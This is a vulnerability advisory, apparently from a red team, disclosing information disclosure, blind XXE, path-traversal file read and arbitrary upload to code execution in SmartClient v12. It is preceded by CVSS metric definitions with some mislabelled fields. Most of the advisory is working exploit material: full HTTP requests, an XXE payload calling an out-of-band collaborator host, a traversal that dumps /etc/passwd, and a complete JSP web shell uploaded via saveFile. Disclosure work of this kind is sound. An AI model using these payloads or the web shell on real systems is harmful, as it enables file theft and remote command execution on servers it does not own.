The vulnerable system is not bound to the network stack and the attacker’s path is via read/write/execute capabilities. Either: the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or through terminal emulation (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., using social engineering techniques to trick a legitimate user into opening a malicious document).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Attack Requirements
Present
AT
The successful attack depends on the presence of specific deployment and execution conditions of the vulnerable system that enable the attack. These include: A race condition must be won to successfully exploit the vulnerability. The successfulness of the attack is conditioned on execution conditions that are not under full control of the attacker. The attack may need to be launched multiple times against a single target before being successful. Network injection. The attacker must inject themselves into the logical network path between the target and the resource requested by the victim (e.g. vulnerabilities requiring an on-path attacker).
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Confidentiality Impact to the Vulnerable System
High
VC
There is a total loss of confidentiality, resulting in all information within the Vulnerable System being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.
Availability Impact to the Vulnerable System
High
VI
There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the Vulnerable System. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the Vulnerable System.
Availability Impact to the Vulnerable System
High
VA
There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the Vulnerable System; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the Vulnerable System (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).
Subsequent System Confidentiality Impact
Negligible
SC
There is no loss of confidentiality within the Subsequent System or all confidentiality impact is constrained to the Vulnerable System.
Integrity Impact to the Subsequent System
None
SI
There is no loss of integrity within the Subsequent System or all integrity impact is constrained to the Vulnerable System.
Availability Impact to the Subsequent System
None
SA
There is no loss of availibility within the Subsequent System or all availibility impact is constrained to the Vulnerable System.
Below is a copy: SmartClient 120 Information Disclosure / XML Injection / LFI / Code Execution
Hello,
We are informing you about some vulnerabilities we found in SmartClient_v120.
1. Description
During an analysis on the Isomorphic Smartclient v12 LGPL version, we found multiple security flaws that are here described.
The application we tested (SmartClient_v120p_2019-06-13_LGPL) can be downloaded from official website. (https://www.smartclient.com/product/download.jsp)
As today is the latest version.
1) Information Disclosure on absolute path
The path /tools/developerConsoleOperations.jsp allows a user to test some functionalities. The server accepts in the _transaction parameter XML data and in the appID a valid name; The vulnerable functionality should be also reachable from /isomorphic/IDACall.
If a user makes a request on this path, the server replies with a verbose error showing where the application resides (his absolute path). This issue can be used by a malicious user to improve his knowledge about the environment and used for further attacks and to.
The path is reachable without any authentication by default.
2) XML External Entity on downloadWSDL
The path /tools/developerConsoleOperations.jsp allows a user to test some functionalities. The server accepts in the _transaction parameter XML data and in the appID a valid name.
A WSDL describes the structure of a SOAP webservice and is basically an XML file.
The isomorphic downloadWSDL functionality allows to download and verify a new WSDL (Web Services Description Language).
The WSDL document source of the document isnt checked at all and an attacker can provide a malicious XML file to trigger a blind XXE vulnerability.
The path is reachable without any authentication by default.
Here there is the javadoc of the resource: https://www.smartclient.com/smartgwtee-12.1/server/javadoc/com/isomorphic/rpc/BuiltinRPC.html#downloadWSDL-java.lang.String-java.lang.String-java.lang.String-com.isomorphic.rpc.RPCManager-javax.servlet.http.HttpServletRequest-javax.servlet.http.HttpServletResponse-
3) Local File Inclusion on loadFile method
The Remote Procedure Call (RPC) loadFile provided by the console functionality on the /tools/developerConsoleOperations.jsp URL is affected by an LFI issue; The vulnerable functionality should be also reachable from /isomorphic/IDACall.
Its possible to tamper the elem tag in the XML contained in the _transaction POST parameter with a path traversal payload to exfiltrate arbitrary file from the file-system.
The path is reachable without any authentication by default.
Here there is the javadoc of the resource: https://www.smartclient.com/smartgwtee-12.1/server/javadoc/com/isomorphic/rpc/BuiltinRPC.html#loadFile-java.lang.String-
4) Arbitrary File Upload on SaveFile that could lead to RCE
The Remote Procedure Call (RPC) saveFile provided by the console functionality on the /tools/developerConsoleOperations.jsp URL allows a user to upload any file; The vulnerable functionality should be also reachable from /isomorphic/IDACall.
There isnt any check on the file extension or its content.
The data accepted by the server code shouldnt contain any characters that is used in the XML syntax like <. This limit can be bypassed using the comment of the XML with <![CDATA[.
The saved file can be reached inside the web-root with the name of the file used during the file upload.
Also, a file can be uploaded outside the web-root with a path traversal on the file system.
As a test we uploaded a file to /../../../../../../../../../../../tmp/test.txt. This allow an attacker to potentially rewrite system files, depending on the current user that execute isomorphic.
The path is reachable without any authentication by default.
Here there is the javadoc of the resource: https://www.smartclient.com/smartgwtee-12.1/server/javadoc/com/isomorphic/rpc/BuiltinRPC.html#saveFile-java.lang.String-java.lang.String-
2. Step to reproduce:
- Download the open source version of SmartClient 12.0 from: https://www.smartclient.com/product/download-bounce.jsp?product=smartclient&license=lgpl&version=12.0p&nightly=true
- Unzip the archive and navigate in smartclientSDK
- Run the script "start_embedded_server.sh". A web server with an istance of smartclient will be at http://localhost:8080
- Use the following payloads to trigger the vulnerabilities.
===========================================================================================================================================================================================
===========================================================================================================================================================================================
1) Information Disclosure on absolute path
POST /isomorphic/IDACall?isc_rpc=1&isc_v=asd&isc_tnum=3&isc_dd=a HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 610
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/isomorphic/system/helpers/Log.html
Cookie: GLog=%7B%0A%20%20%20%20isc_pageURL%3A%22http%3A//localhost%3A8081/docs/resources/explorer.html%22%2C%20%0A%20%20%20%20isc_pageGUID%3A%22BEF212E4-B94A-4030-B4C4-EFA951EFD204%22%2C%20%0A%20%20%20%20priorityDefaults%3A%7B%0A%20%20%20%20%20%20%20%20sgwtInternal%3A1%2C%20%0A%20%20%20%20%20%20%20%20Log%3A4%0A%20%20%20%20%7D%2C%20%0A%20%20%20%20defaultPriority%3A3%2C%20%0A%20%20%20%20left%3A0%2C%20%0A%20%20%20%20top%3A0%2C%20%0A%20%20%20%20width%3A996%2C%20%0A%20%20%20%20height%3A549%2C%20%0A%20%20%20%20trackRPC%3Anull%0A%7D; JSESSIONID=8CF7DFB620FA8D796DE055F83901909D
Upgrade-Insecure-Requests: 1
_transaction=<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">5</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID>XXXXXXX</appID><className>TEST</className><methodName>downloadWSDL</methodName><arguments xsi:type="xsd:List"><elem>http://10.1.100.6:8000/test.xml</elem><elem>xml</elem><elem>aaaaaa.xml</elem></arguments><is_ISC_RPC_DMI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI></elem></operations><jscallback>iframe</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_0
Response from server:
HTTP/1.1 200
Set-Cookie: JSESSIONID=41CEC8DFC7B8968C0D7EDCABB0A5924B; Path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: Wed, 02 Oct 2019 15:55:02 GMT
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Oct 2019 15:55:02 GMT
Connection: close
Content-Length: 874
<HTML>
<BODY ONLOAD='var results = document.formResults.results.value;if (!(new RegExp("^(\\d{1,3}\\.){3}\\d{1,3}$").test(document.domain))) {while (!window.isc && document.domain.indexOf(".") != -1 ) { try { parent.isc; break;} catch (e) {document.domain = document.domain.replace(/.*?\./, "");}}}parent.isc.Comm.hiddenFrameReply(5,results)'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM name='formResults'><TEXTAREA readonly name='results'>
//isc_RPCResponseStart-->[{data:"An error occurred when executing this operation on the server.\nException details are as follows:\n\njava.lang.Exception: Unable to locate XXXXXXX.app.xml - check to make sure it's available in /mnt/c/Users/XXXXXXX/Desktop/smartclient/SmartClient_v120p_2019-06-13_LGPL/smartclientSDK/shared/app",status:-1}]//isc_RPCResponseEnd</TEXTAREA></FORM>
</BODY></HTML>
===========================================================================================================================================================================================
===========================================================================================================================================================================================
2) XML External Entity on downloadWSDL
For this vulnerability, it's necessary create a local python server to get a valid blind xxe payload such as:
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
]>
<r></r>
Save the payload in a file (e.g. xxe.xml) and start a python server: python -m SimpleHTTPServer 10000
Use this request to trigger the XXE:
POST /tools/developerConsoleOperations.jsp?isc_rpc=1&isc_v=v12.0p_2019-06-13&isc_tnum=13 HTTP/1.1
Host: 10.1.100.8:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 616
Connection: close
Upgrade-Insecure-Requests: 1
_transaction=<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">13</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><appID>isc_builtin</appID><className>builtin</className><methodName>downloadWSDL</methodName><arguments xsi:type="xsd:List"><elem>http://localhost:10000/xxe.xml</elem><elem>xml</elem><elem>aaaaa</elem></arguments><is_ISC_RPC_DMI xsi:type="xsd:boolean">true</is_ISC_RPC_DMI></elem></operations><jscallback>iframe</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_5
===========================================================================================================================================================================================
===========================================================================================================================================================================================
3) Local File Inclusion on loadFile method
With the following payload can be retrieved the "/etc/passwd":
POST /isomorphic/IDACall?isc_rpc=1&isc_v=asd&isc_tnum=3&isc_dd=a HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 686
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/isomorphic/system/helpers/Log.html
Cookie: GLog=%7B%0A%20%20%20%20isc_pageURL%3A%22http%3A//localhost%3A8081/docs/resources/explorer.html%22%2C%20%0A%20%20%20%20isc_pageGUID%3A%22BEF212E4-B94A-4030-B4C4-EFA951EFD204%22%2C%20%0A%20%20%20%20priorityDefaults%3A%7B%0A%20%20%20%20%20%20%20%20sgwtInternal%3A1%2C%20%0A%20%20%20%20%20%20%20%20Log%3A4%0A%20%20%20%20%7D%2C%20%0A%20%20%20%20defaultPriority%3A3%2C%20%0A%20%20%20%20left%3A0%2C%20%0A%20%20%20%20top%3A0%2C%20%0A%20%20%20%20width%3A996%2C%20%0A%20%20%20%20height%3A549%2C%20%0A%20%20%20%20trackRPC%3Anull%0A%7D; JSESSIONID=8CF7DFB620FA8D796DE055F83901909D
Upgrade-Insecure-Requests: 1
_transaction=<transaction+xmlns%3axsi%3d"http%3a//www.w3.org/2000/10/XMLSchema-instance"+xsi%3atype%3d"xsd%3aObject"><transactionNum+xsi%3atype%3d"xsd%3along">3</transactionNum><operations+xsi%3atype%3d"xsd%3aList"><elem+xsi%3atype%3d"xsd%3aObject"><appID>isc_builtin</appID><className>builtin</className><methodName>loadFile</methodName><arguments+xsi%3atype%3d"xsd%3aList"><elem>../../../../../../../../../../../../../../../../../../etc/passwd</elem><elem>xml</elem><elem>asd.xml</elem></arguments><is_ISC_RPC_DMI+xsi%3atype%3d"xsd%3aboolean">true</is_ISC_RPC_DMI></elem></operations><jscallback>iframe</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_0
Response from server:
HTTP/1.1 200
Cache-Control: no-cache
Pragma: no-cache
Expires: Fri, 04 Oct 2019 13:48:05 GMT
Content-Type: text/html;charset=UTF-8
Date: Fri, 13 Sep 2019 13:48:05 GMT
Connection: close
Content-Length: 1615
<HTML>
<BODY ONLOAD='var results = document.formResults.results.value;iframjje'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM name='formResults'><TEXTAREA readonly name='results'>
//isc_RPCResponseStart-->[{data:"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nredTeamCMG:x:1000:1000:,,,:/home/XXXXXXXX:/bin/bash\nmessagebus:x:104:110::/nonexistent:/usr/sbin/nologin\n",status:0}]//isc_RPCResponseEnd</TEXTAREA></FORM>
</BODY></HTML>
===========================================================================================================================================================================================
===========================================================================================================================================================================================
4) Arbitrary File Upload on SaveFile that lead to RCE
POST /isomorphic/IDACall?isc_rpc=1&isc_v=asd&isc_tnum=3&isc_dd=a HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1440
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/isomorphic/system/helpers/Log.html
Cookie: GLog=%7B%0A%20%20%20%20isc_pageURL%3A%22http%3A//localhost%3A8081/docs/resources/explorer.html%22%2C%20%0A%20%20%20%20isc_pageGUID%3A%22BEF212E4-B94A-4030-B4C4-EFA951EFD204%22%2C%20%0A%20%20%20%20priorityDefaults%3A%7B%0A%20%20%20%20%20%20%20%20sgwtInternal%3A1%2C%20%0A%20%20%20%20%20%20%20%20Log%3A4%0A%20%20%20%20%7D%2C%20%0A%20%20%20%20defaultPriority%3A3%2C%20%0A%20%20%20%20left%3A0%2C%20%0A%20%20%20%20top%3A0%2C%20%0A%20%20%20%20width%3A996%2C%20%0A%20%20%20%20height%3A549%2C%20%0A%20%20%20%20trackRPC%3Anull%0A%7D; JSESSIONID=8CF7DFB620FA8D796DE055F83901909D
Upgrade-Insecure-Requests: 1
_transaction=<transaction+xmlns%3axsi%3d"http%3a//www.w3.org/2000/10/XMLSchema-instance"+xsi%3atype%3d"xsd%3aObject"><transactionNum+xsi%3atype%3d"xsd%3along">5</transactionNum><operations+xsi%3atype%3d"xsd%3aList"><elem+xsi%3atype%3d"xsd%3aObject"><appID>isc_builtin</appID><className>builtin</className><methodName>saveFile</methodName><arguments+xsi%3atype%3d"xsd%3aList"><elem>/shell.jsp</elem><elem>
<![CDATA[+
<%25%40+page+import%3d"java.util.*,java.io.*"%25>
<HTML><BODY>
<FORM+METHOD%3d"GET"+NAME%3d"myform"+ACTION%3d"">
<INPUT+TYPE%3d"text"+NAME%3d"cmd">
<INPUT+TYPE%3d"submit"+VALUE%3d"Send">
</FORM>
<pre>
<%25
if+(request.getParameter("cmd")+!%3d+null)+{
++++++++out.println("Command%3a+"+%2b+request.getParameter("cmd")+%2b+"<BR>")%3b
++++++++Process+p+%3d+Runtime.getRuntime().exec(request.getParameter("cmd"))%3b
++++++++OutputStream+os+%3d+p.getOutputStream()%3b
++++++++InputStream+in+%3d+p.getInputStream()%3b
++++++++DataInputStream+dis+%3d+new+DataInputStream(in)%3b
++++++++String+disr+%3d+dis.readLine()%3b
++++++++while+(+disr+!%3d+null+)+{
++++++++++++++++out.println(disr)%3b+
++++++++++++++++disr+%3d+dis.readLine()%3b+
++++++++++++++++}
++++++++}
%25>
</pre>
</BODY></HTML>
]]>
</elem></arguments><is_ISC_RPC_DMI+xsi%3atype%3d"xsd%3aboolean">true</is_ISC_RPC_DMI></elem></operations><jscallback>iframjje</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=isc_HiddenFrame_0
Response from server:
HTTP/1.1 200
Cache-Control: no-cache
Pragma: no-cache
Expires: Fri, 04 Oct 2019 13:59:05 GMT
Content-Type: text/html;charset=UTF-8
Date: Fri, 13 Sep 2019 13:59:05 GMT
Connection: close
Content-Length: 352
<HTML>
<SCRIPT>document.domain = 'a';</SCRIPT>
<BODY ONLOAD='var results = document.formResults.results.value;iframjje'><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><FORM name='formResults'><TEXTAREA readonly name='results'>
//isc_RPCResponseStart-->[{data:null,status:0}]//isc_RPCResponseEnd</TEXTAREA></FORM>
</BODY></HTML>
After upload navigate to http://local_smartclient:PORT/shell.jsp?cmd=whoami
===========================================================================================================================================================================================
===========================================================================================================================================================================================
Timeline
- 29/10/2019 Sent the first email to developers (info[at]smartclient.com, support[at]smartclient.com). No response.
- 05/11/2019 Sent the second email to developers (info[at]smartclient.com, support[at]smartclient.com). No response.
- 18/02/2020 Issues published on seclist.org
--
RedTeam
Certimeter Group
Corso Svizzera, 185 - 10149 - Torino
Piazza IV Novembre, 4 - 20124 - Milano
Tel +39 011 7741894
www.certimetergroup.com